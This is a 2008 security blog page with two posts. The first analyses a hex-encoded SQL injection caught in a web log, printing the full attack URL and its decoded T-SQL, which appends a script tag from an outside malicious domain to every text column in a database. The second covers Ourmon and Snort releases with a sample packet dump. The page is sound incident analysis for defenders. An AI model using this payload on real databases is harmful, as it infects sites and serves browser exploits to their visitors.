Posts Tagged ‘IDS’

Encoded SQL Injection

Thursday, April 24th, 2008

There is nothing new when you read security advisories on SQL injection vulnerabilities found on certain products or applications. Most of the SQL injection that I have dealt with are plain SQL code injection, which allow me to easily search the sign of SQL injection attack in http log, unless the bad guys are using POST method inside a form or something else.

Today I have discovered a rare encoded SQL injection in one website’s http log that targeted on a MS SQL database. The bad guys had used the HTTP method GET, with encoded code in the SQL injection code. It was not difficult to detect it due to its long URL, and below is the code.

script.asp?var=random';DECLARE%[email protected]%20NVARCHAR(4000);SET%[email protected]=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

This is the decoded version of the HEX code in the CAST function:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['[email protected]+'] set ['[email protected]+']=rtrim(convert(varchar,['[email protected]+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

It seems that there is a loop in the HEX code to update the js script after 30 characters in the field, disregard if there are more than 30 characters in the field, the SQL code will be injected the first time, and another after 30th character.

With encoded SQL code, the injection could easily bypass IDS and prevention rules. Unless you have set the IDS to alert if certain number characters in URL is passing through the IDS, or inspected HTTP log from time to time.

The js script redirects users to another page, 1.htm, and then try to download the exploits which try to exploit outdated Real Player, and a few MS remote code execution vulnerabilities such as MS06-014, MS07-004, MS07-018 and a few others. So, make sure your Windows and other third party applications are always updated to the latest version or have the latest patch applied.

Updates:
It seems that this domain has been listed in malwaredomains.com since 17th April.

Ourmon and Snort 2.8.1 Released

Friday, April 4th, 2008

I noticed Ourmon 2.8.1 is quietly released on 21 March 2008. This bug-fix release fixes the bugs that I have reported previously, and my name is in the release note. The IP blacklist config takes 3 argument now, this helps when you have multiple blacklists, so you immediately tell which blacklist caused the message, but I am yet to test this feature.
For example in ourmon.conf:

blist_include "irc"  /home/mrourmon/etc/ipblacklist.txt

Snort LogoSnort, an open source network intrusion prevention and detection system, releases version 2.8.1. I got a 404 error while I was trying to download Snort 2.8.0.2 yesterday and noticed the file was not there anymore. Within few minutes, the Snort download page was refreshed and replaced with new v2.8.1 package. Coincidentally, the release version number is same with Ourmon latest bug-fix release. In v2.8.1, one of the new additions is the ability to read multiple pcaps from the command line, which I have usually done with Argus. Here is the sample:

[[email protected] /]# snort -dv -r irc1.pcap -r irc2.pcap | less
Running in packet dump mode

        --== Initializing Snort ==--
Initializing Output Plugins!
Verifying Preprocessor Configurations!
TCPDUMP file reading mode.
Reading network traffic from "irc1.pcap" file.
snaplen = 65535

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.8.1 (Build 28)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/team.html
           (C) Copyright 1998-2008 Sourcefire Inc., et al.
           Using PCRE version: 7.6 2008-01-28

Not Using PCAP_FRAMES
07/11-08:00:32.312306 192.168.128.86:6667 -> 10.1.2.177:32793
TCP TTL:40 TOS:0x0 ID:51682 IpLen:20 DgmLen:91 DF
***AP*** Seq: 0xB368B2EB  Ack: 0xE79F2A5  Win: 0xB50  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2184210158 757152
3A 62 6D 77 30 37 21 34 76 71 74 71 74 34 40 38  :[email protected]
32 2E 37 39 2E 38 37 2E 37 39 20 4A 4F 49 4E 20  2.79.87.79 JOIN
23 61 6C 62 61 0D 0A                                               #alba..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+